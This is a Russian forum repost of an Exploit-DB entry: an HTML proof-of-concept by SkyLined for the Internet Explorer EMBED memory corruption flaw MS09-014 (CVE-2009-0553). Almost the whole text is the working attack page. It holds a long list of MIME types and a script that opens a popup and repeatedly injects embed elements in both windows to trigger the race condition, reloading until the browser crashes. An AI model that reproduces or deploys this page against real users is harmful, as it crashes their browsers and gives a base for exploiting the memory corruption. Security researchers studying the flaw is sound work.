Exploit Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8479
Проверка EDB
  1. Пройдено
Автор
SKYLINED
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-0553
Дата публикации
2009-04-20
HTML:
<BODY onload=go()></BODY>
<!--
MS09-014: MSIE EMBED element race condition memory corruption
Code by SkyLined <[email protected]>
http://skypher.com/SkyLined/Repro/MSIE/EMBED%20memory%20corruption/repro3.html
http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption
-->
<SCRIPT>
	var asMimeTypes = [
		"x-world/x-3dmf",
		"x-world/x-3dmf",
		"application/octet-stream",
		"application/x-authorware-bin",
		"application/x-authorware-map",
		"application/x-authorware-seg",
		"text/vnd.abc",
		"text/html",
		"video/animaflex",
		"application/postscript",
		"audio/aiff",
		"audio/x-aiff",
		"audio/aiff",
		"audio/x-aiff",
		"audio/aiff",
		"audio/x-aiff",
		"application/x-aim",
		"text/x-audiosoft-intra",
		"application/x-navi-animation",
		"application/x-nokia-9000-communicator-add-on-software",
		"application/mime",
		"application/octet-stream",
		"application/arj",
		"application/octet-stream",
		"image/x-jg",
		"video/x-ms-asf",
		"text/x-asm",
		"text/asp",
		"application/x-mplayer2",
		"video/x-ms-asf",
		"video/x-ms-asf-plugin",
		"audio/basic",
		"audio/x-au",
		"application/x-troff-msvideo",
		"video/avi",
		"video/msvideo",
		"video/x-msvideo",
		"video/avs-video",
		"application/x-bcpio",
		"application/mac-binary",
		"application/macbinary",
		"application/octet-stream",
		"application/x-binary",
		"application/x-macbinary",
		"image/bmp",
		"image/bmp",
		"image/x-windows-bmp",
		"application/book",
		"application/book",
		"application/x-bzip2",
		"application/x-bsh",
		"application/x-bzip",
		"application/x-bzip2",
		"text/plain",
		"text/x-c",
		"text/plain",
		"application/vnd.ms-pki.seccat",
		"text/plain",
		"text/x-c",
		"application/clariscad",
		"application/x-cocoa",
		"application/cdf",
		"application/x-cdf",
		"application/x-netcdf",
		"application/pkix-cert",
		"application/x-x509-ca-cert",
		"application/x-chat",
		"application/x-chat",
		"application/java",
		"application/java-byte-code",
		"application/x-java-class",
		"application/octet-stream",
		"text/plain",
		"text/plain",
		"application/x-cpio",
		"text/x-c",
		"application/mac-compactpro",
		"application/x-compactpro",
		"application/x-cpt",
		"application/pkcs-crl",
		"application/pkix-crl",
		"application/pkix-cert",
		"application/x-x509-ca-cert",
		"application/x-x509-user-cert",
		"application/x-csh",
		"text/x-script.csh",
		"application/x-pointplus",
		"text/css",
		"text/plain",
		"application/x-director",
		"application/x-deepv",
		"text/plain",
		"application/x-x509-ca-cert",
		"video/x-dv",
		"application/x-director",
		"video/dl",
		"video/x-dl",
		"application/msword",
		"application/msword",
		"application/commonground",
		"application/drafting",
		"application/octet-stream",
		"video/x-dv",
		"application/x-dvi",
		"drawing/x-dwf (old)",
		"model/vnd.dwf",
		"application/acad",
		"image/vnd.dwg",
		"image/x-dwg",
		"application/dxf",
		"image/vnd.dwg",
		"image/x-dwg",
		"application/x-director",
		"text/x-script.elisp",
		"application/x-bytecode.elisp (compiled elisp)",
		"application/x-elc",
		"application/x-envoy",
		"application/postscript",
		"application/x-esrehber",
		"text/x-setext",
		"application/envoy",
		"application/x-envoy",
		"application/octet-stream",
		"text/plain",
		"text/x-fortran",
		"text/x-fortran",
		"text/plain",
		"text/x-fortran",
		"application/vnd.fdf",
		"application/fractals",
		"image/fif",
		"video/fli",
		"video/x-fli",
		"image/florian",
		"text/vnd.fmi.flexstor",
		"video/x-atomic3d-feature",
		"text/plain",
		"text/x-fortran",
		"image/vnd.fpx",
		"image/vnd.net-fpx",
		"application/freeloader",
		"audio/make",
		"text/plain",
		"image/g3fax",
		"image/gif",
		"video/gl",
		"video/x-gl",
		"audio/x-gsm",
		"audio/x-gsm",
		"application/x-gsp",
		"application/x-gss",
		"application/x-gtar",
		"application/x-compressed",
		"application/x-gzip",
		"application/x-gzip",
		"multipart/x-gzip",
		"text/plain",
		"text/x-h",
		"application/x-hdf",
		"application/x-helpfile",
		"application/vnd.hp-hpgl",
		"text/plain",
		"text/x-h",
		"text/x-script",
		"application/hlp",
		"application/x-helpfile",
		"application/x-winhelp",
		"application/vnd.hp-hpgl",
		"application/vnd.hp-hpgl",
		"application/binhex",
		"application/binhex4",
		"application/mac-binhex",
		"application/mac-binhex40",
		"application/x-binhex40",
		"application/x-mac-binhex40",
		"application/hta",
		"text/x-component",
		"text/html",
		"text/html",
		"text/html",
		"text/webviewhtml",
		"text/html",
		"x-conference/x-cooltalk",
		"image/x-icon",
		"text/plain",
		"image/ief",
		"image/ief",
		"application/iges",
		"model/iges",
		"application/iges",
		"model/iges",
		"application/x-ima",
		"application/x-httpd-imap",
		"application/inf",
		"application/x-internett-signup",
		"application/x-ip2",
		"video/x-isvideo",
		"audio/it",
		"application/x-inventor",
		"i-world/i-vrml",
		"application/x-livescreen",
		"audio/x-jam",
		"text/plain",
		"text/x-java-source",
		"text/plain",
		"text/x-java-source",
		"application/x-java-commerce",
		"image/jpeg",
		"image/pjpeg",
		"image/jpeg",
		"image/jpeg",
		"image/pjpeg",
		"image/jpeg",
		"image/pjpeg",
		"image/jpeg",
		"image/pjpeg",
		"image/x-jps",
		"application/x-javascript",
		"image/jutvision",
		"audio/midi",
		"music/x-karaoke",
		"application/x-ksh",
		"text/x-script.ksh",
		"audio/nspaudio",
		"audio/x-nspaudio",
		"audio/x-liveaudio",
		"application/x-latex",
		"application/lha",
		"application/octet-stream",
		"application/x-lha",
		"application/octet-stream",
		"text/plain",
		"audio/nspaudio",
		"audio/x-nspaudio",
		"text/plain",
		"application/x-lisp",
		"text/x-script.lisp",
		"text/plain",
		"text/x-la-asf",
		"application/x-latex",
		"application/octet-stream",
		"application/x-lzh",
		"application/lzx",
		"application/octet-stream",
		"application/x-lzx",
		"text/plain",
		"text/x-m",
		"video/mpeg",
		"audio/mpeg",
		"video/mpeg",
		"audio/x-mpequrl",
		"application/x-troff-man",
		"application/x-navimap",
		"text/plain",
		"application/mbedlet",
		"application/x-magic-cap-package-1.0",
		"application/mcad",
		"application/x-mathcad",
		"image/vasa",
		"text/mcf",
		"application/netmc",
		"application/x-troff-me",
		"message/rfc822",
		"message/rfc822",
		"application/x-midi",
		"audio/midi",
		"audio/x-mid",
		"audio/x-midi",
		"music/crescendo",
		"x-music/x-midi",
		"application/x-midi",
		"audio/midi",
		"audio/x-mid",
		"audio/x-midi",
		"music/crescendo",
		"x-music/x-midi",
		"application/x-frame",
		"application/x-mif",
		"message/rfc822",
		"www/mime",
		"audio/x-vnd.audioexplosion.mjuicemediafile",
		"video/x-motion-jpeg",
		"application/base64",
		"application/x-meme",
		"application/base64",
		"audio/mod",
		"audio/x-mod",
		"video/quicktime",
		"video/quicktime",
		"video/x-sgi-movie",
		"audio/mpeg",
		"audio/x-mpeg",
		"video/mpeg",
		"video/x-mpeg",
		"video/x-mpeq2a",
		"audio/mpeg3",
		"audio/x-mpeg-3",
		"video/mpeg",
		"video/x-mpeg",
		"audio/mpeg",
		"video/mpeg",
		"application/x-project",
		"video/mpeg",
		"video/mpeg",
		"audio/mpeg",
		"video/mpeg",
		"audio/mpeg",
		"application/vnd.ms-project",
		"application/x-project",
		"application/x-project",
		"application/x-project",
		"application/marc",
		"application/x-troff-ms",
		"video/x-sgi-movie",
		"audio/make",
		"application/x-vnd.audioexplosion.mzz",
		"image/naplps",
		"image/naplps",
		"application/x-netcdf",
		"application/vnd.nokia.configuration-message",
		"image/x-niff",
		"image/x-niff",
		"application/x-mix-transfer",
		"application/x-conference",
		"application/x-navidoc",
		"application/octet-stream",
		"application/oda",
		"application/x-omc",
		"application/x-omcdatamaker",
		"application/x-omcregerator",
		"text/x-pascal",
		"application/pkcs10",
		"application/x-pkcs10",
		"application/pkcs-12",
		"application/x-pkcs12",
		"application/x-pkcs7-signature",
		"application/pkcs7-mime",
		"application/x-pkcs7-mime",
		"application/pkcs7-mime",
		"application/x-pkcs7-mime",
		"application/x-pkcs7-certreqresp",
		"application/pkcs7-signature",
		"application/pro_eng",
		"text/pascal",
		"image/x-portable-bitmap",
		"application/vnd.hp-pcl",
		"application/x-pcl",
		"image/x-pict",
		"image/x-pcx",
		"chemical/x-pdb",
		"application/pdf",
		"audio/make",
		"audio/make.my.funk",
		"image/x-portable-graymap",
		"image/x-portable-greymap",
		"image/pict",
		"image/pict",
		"application/x-newton-compatible-pkg",
		"application/vnd.ms-pki.pko",
		"text/plain",
		"text/x-script.perl",
		"application/x-pixclscript",
		"image/x-xpixmap",
		"text/x-script.perl-module",
		"application/x-pagemaker",
		"application/x-pagemaker",
		"image/png",
		"application/x-portable-anymap",
		"image/x-portable-anymap",
		"application/mspowerpoint",
		"application/vnd.ms-powerpoint",
		"model/x-pov",
		"application/vnd.ms-powerpoint",
		"image/x-portable-pixmap",
		"application/mspowerpoint",
		"application/vnd.ms-powerpoint",
		"application/mspowerpoint",
		"application/powerpoint",
		"application/vnd.ms-powerpoint",
		"application/x-mspowerpoint",
		"application/mspowerpoint",
		"application/x-freelance",
		"application/pro_eng",
		"application/postscript",
		"application/octet-stream",
		"paleovu/x-pv",
		"application/vnd.ms-powerpoint",
		"text/x-script.phyton",
		"applicaiton/x-bytecode.python",
		"audio/vnd.qcelp",
		"x-world/x-3dmf",
		"x-world/x-3dmf",
		"image/x-quicktime",
		"video/quicktime",
		"video/x-qtc",
		"image/x-quicktime",
		"image/x-quicktime",
		"audio/x-pn-realaudio",
		"audio/x-pn-realaudio-plugin",
		"audio/x-realaudio",
		"audio/x-pn-realaudio",
		"application/x-cmu-raster",
		"image/cmu-raster",
		"image/x-cmu-raster",
		"image/cmu-raster",
		"text/x-script.rexx",
		"image/vnd.rn-realflash",
		"image/x-rgb",
		"application/vnd.rn-realmedia",
		"audio/x-pn-realaudio",
		"audio/mid",
		"audio/x-pn-realaudio",
		"audio/x-pn-realaudio",
		"audio/x-pn-realaudio-plugin",
		"application/ringing-tones",
		"application/vnd.nokia.ringing-tone",
		"application/vnd.rn-realplayer",
		"application/x-troff",
		"image/vnd.rn-realpix",
		"audio/x-pn-realaudio-plugin",
		"text/richtext",
		"text/vnd.rn-realtext",
		"application/rtf",
		"application/x-rtf",
		"text/richtext",
		"application/rtf",
		"text/richtext",
		"video/vnd.rn-realvideo",
		"text/x-asm",
		"audio/s3m",
		"application/octet-stream",
		"application/x-tbook",
		"application/x-lotusscreencam",
		"text/x-script.guile",
		"text/x-script.scheme",
		"video/x-scm",
		"text/plain",
		"application/sdp",
		"application/x-sdp",
		"application/sounder",
		"application/sea",
		"application/x-sea",
		"application/set",
		"text/sgml",
		"text/x-sgml",
		"text/sgml",
		"text/x-sgml",
		"application/x-bsh",
		"application/x-sh",
		"application/x-shar",
		"text/x-script.sh",
		"application/x-bsh",
		"application/x-shar",
		"text/html",
		"text/x-server-parsed-html",
		"audio/x-psid",
		"application/x-sit",
		"application/x-stuffit",
		"application/x-koan",
		"application/x-koan",
		"application/x-koan",
		"application/x-koan",
		"application/x-seelogo",
		"application/smil",
		"application/smil",
		"audio/basic",
		"audio/x-adpcm",
		"application/solids",
		"application/x-pkcs7-certificates",
		"text/x-speech",
		"application/futuresplash",
		"application/x-sprite",
		"application/x-sprite",
		"application/x-wais-source",
		"text/x-server-parsed-html",
		"application/streamingmedia",
		"application/vnd.ms-pki.certstore",
		"application/step",
		"application/sla",
		"application/vnd.ms-pki.stl",
		"application/x-navistyle",
		"application/step",
		"application/x-sv4cpio",
		"application/x-sv4crc",
		"image/vnd.dwg",
		"image/x-dwg",
		"application/x-world",
		"x-world/x-svr",
		"application/x-shockwave-flash",
		"application/x-troff",
		"text/x-speech",
		"application/x-tar",
		"application/toolbook",
		"application/x-tbook",
		"application/x-tcl",
		"text/x-script.tcl",
		"text/x-script.tcsh",
		"application/x-tex",
		"application/x-texinfo",
		"application/x-texinfo",
		"application/plain",
		"text/plain",
		"application/gnutar",
		"application/x-compressed",
		"image/tiff",
		"image/x-tiff",
		"image/tiff",
		"image/x-tiff",
		"application/x-troff",
		"audio/tsp-audio",
		"application/dsptype",
		"audio/tsplayer",
		"text/tab-separated-values",
		"image/florian",
		"text/plain",
		"text/x-uil",
		"text/uri-list",
		"text/uri-list",
		"application/i-deas",
		"text/uri-list",
		"text/uri-list",
		"application/x-ustar",
		"multipart/x-ustar",
		"application/octet-stream",
		"text/x-uuencode",
		"text/x-uuencode",
		"application/x-cdlink",
		"text/x-vcalendar",
		"application/vda",
		"video/vdo",
		"application/groupwise",
		"video/vivo",
		"video/vnd.vivo",
		"video/vivo",
		"video/vnd.vivo",
		"application/vocaltec-media-desc",
		"application/vocaltec-media-file",
		"audio/voc",
		"audio/x-voc",
		"video/vosaic",
		"audio/voxware",
		"audio/x-twinvq-plugin",
		"audio/x-twinvq",
		"audio/x-twinvq-plugin",
		"application/x-vrml",
		"model/vrml",
		"x-world/x-vrml",
		"x-world/x-vrt",
		"application/x-visio",
		"application/x-visio",
		"application/x-visio",
		"application/wordperfect6.0",
		"application/wordperfect6.1",
		"application/msword",
		"audio/wav",
		"audio/x-wav",
		"application/x-qpro",
		"image/vnd.wap.wbmp",
		"application/vnd.xara",
		"application/msword",
		"application/x-123",
		"windows/metafile",
		"text/vnd.wap.wml",
		"application/vnd.wap.wmlc",
		"text/vnd.wap.wmlscript",
		"application/vnd.wap.wmlscriptc",
		"application/msword",
		"application/wordperfect",
		"application/wordperfect",
		"application/wordperfect6.0",
		"application/wordperfect",
		"application/wordperfect",
		"application/x-wpwin",
		"application/x-lotus",
		"application/mswrite",
		"application/x-wri",
		"application/x-world",
		"model/vrml",
		"x-world/x-vrml",
		"model/vrml",
		"x-world/x-vrml",
		"text/scriplet",
		"application/x-wais-source",
		"application/x-wintalk",
		"image/x-xbitmap",
		"image/x-xbm",
		"image/xbm",
		"video/x-amt-demorun",
		"xgl/drawing",
		"image/vnd.xiff",
		"application/excel",
		"application/excel",
		"application/x-excel",
		"application/x-msexcel",
		"application/excel",
		"application/vnd.ms-excel",
		"application/x-excel",
		"application/excel",
		"application/vnd.ms-excel",
		"application/x-excel",
		"application/excel",
		"application/x-excel",
		"application/excel",
		"application/x-excel",
		"application/excel",
		"application/vnd.ms-excel",
		"application/x-excel",
		"application/excel",
		"application/vnd.ms-excel",
		"application/x-excel",
		"application/excel",
		"application/vnd.ms-excel",
		"application/x-excel",
		"application/x-msexcel",
		"application/excel",
		"application/x-excel",
		"application/excel",
		"application/x-excel",
		"application/excel",
		"application/vnd.ms-excel",
		"application/x-excel",
		"application/x-msexcel",
		"audio/xm",
		"application/xml",
		"text/xml",
		"xgl/movie",
		"application/x-vnd.ls-xpix",
		"image/x-xpixmap",
		"image/xpm",
		"image/png",
		"video/x-amt-showrun",
		"image/x-xwd",
		"image/x-xwindowdump",
		"chemical/x-pdb",
		"application/x-compress",
		"application/x-compressed",
		"application/x-compressed",
		"application/x-zip-compressed",
		"application/zip",
		"multipart/x-zip",
		"application/octet-stream",
		"text/x-script.zsh"
	];
	var oWindow = window.open();
	function go() {
		if (oWindow == null) {
			document.body.innerHTML = "Please disable your popup blocker.";
		} else if (asMimeTypes.length > 0) {
			document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>";
			oWindow.document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>"
			setTimeout(go, 1);
		} else {
			oWindow.close();
			document.body.innerHTML = "You appear not to be vulnerable, trying again...";
			location.reload();
		}
	}
</SCRIPT>

# milw0rm.com [2009-04-20]
 
Источник
www.exploit-db.com

Похожие темы